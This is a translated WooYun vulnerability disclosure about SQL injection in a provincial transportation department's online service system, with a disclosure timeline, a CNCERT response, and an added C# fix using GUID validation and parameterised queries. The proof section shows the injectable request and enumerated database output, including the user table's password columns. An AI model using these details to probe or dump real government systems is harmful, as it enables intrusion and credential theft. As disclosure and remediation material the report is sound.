
Vulnerability summary

Defect ID: wooyun-2015-0139611

Title: SQL injection vulnerability in the online service system of a provincial Department of Transportation

Related vendor: CNCERT (National Computer Network Emergency Response Technical Team/Coordination Center of China)

Reported by: qglfnt

Submitted: 2015-09-10 16:42

Fixed: 2015-10-26 11:24

Published: 2015-10-26 11:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organization (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-10: Details sent to the vendor, awaiting vendor handling
2015-09-11: CNCERT was unable to contact the affected organization yet; details disclosed only to the notifying body
2015-09-21: Details disclosed to core white hats and domain experts
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public

Brief description:

As titled.

Detailed description:

**.**.**.**:10080/qymanage/IndexNew.aspx

Proof of vulnerability:

SQL injection request (the pid query parameter is injectable):

GET **.**.**.**:10080/qymanage/XNetHall_OnlineTransact.aspx?pid=877dfc89-f7f9-43cc-a1ea-9c3ca5af6462 HTTP/1.1
Host: **.**.**.**:10080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**:10080/qymanage/IndexNew.aspx
Cookie: ASP.NET_SessionId=zymwkwewpvn3zab5ysc2wggx
Connection: keep-alive


All databases (screenshot: 20150907215314.png)

Current database (screenshot: 20150907215417.png)



Database: YnJJTApproveDB
[295 tables]


Columns of the user table (note the password and signature-password columns UserPWD and UserSignaturePWD):

Database: YnJJTApproveDB
Table: T_User
[17 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| CellPhone | nvarchar |
| CreateTime | datetime |
| Email | nvarchar |
| LastLoginIP | nvarchar |
| LockTime | datetime |
| QAnswers | nvarchar |
| QuestionIDs | nvarchar |
| RealName | nvarchar |
| Status | smallint |
| UserID | uniqueidentifier |
| UserName | nvarchar |
| UserPWD | nvarchar |
| UserSignaturePWD | nvarchar |
| UserType | smallint |
| VerifyCode | nvarchar |
| VerifyCodeGenTime | datetime |
| WrongPWDTimes | smallint |
+-------------------+------------------+


Data (screenshot: 20150907215646.jpg)

Fix recommendation:

Filter the parameters.
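The report's fix is to filter the pid parameter; since the application is ASP.NET and the identifiers in this database are of type uniqueidentifier, the robust form of that fix is to reject anything that is not a well-formed GUID and then pass the value as a typed SQL parameter rather than concatenating it into the query. The following is an added example written for this page, not the vendor's code; the page class name, connection string name, table and column names are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

// Hypothetical code-behind for XNetHall_OnlineTransact.aspx (class name assumed).
public partial class XNetHall_OnlineTransact : Page
{
    // "ApproveDB" is a placeholder connection string name from web.config.
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["ApproveDB"].ConnectionString;

    protected void Page_Load(object sender, EventArgs e)
    {
        // 1. Type check first: pid must be a GUID (the database column is a
        //    uniqueidentifier), so any other input is rejected before it reaches SQL.
        Guid pid;
        if (!Guid.TryParse(Request.QueryString["pid"], out pid))
        {
            Response.StatusCode = 400;
            HttpContext.Current.ApplicationInstance.CompleteRequest();
            return;
        }

        // 2. Parameterised query: the value travels as a typed parameter and is
        //    never part of the SQL text, so it cannot alter the statement.
        //    Table and column names below are assumed for illustration.
        const string sql =
            "SELECT ItemName, ItemDesc FROM ApproveItem WHERE ItemID = @pid";

        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pid", SqlDbType.UniqueIdentifier).Value = pid;
            conn.Open();
            using (SqlDataReader rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                {
                    // Bind rdr["ItemName"], rdr["ItemDesc"] to page controls here.
                }
            }
        }
    }
}
```

Applying the same pattern to every query that takes request input, and running the application's database login with least privilege, also limits what a remaining injection could enumerate (here the whole YnJJTApproveDB schema including the T_User password columns).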

Copyright notice: when reposting, please credit the source: qglfnt@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-11 11:23

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded through CNCERT to the Yunnan branch center, which will coordinate remediation with the organization that administers the website.

Latest status:

None yet

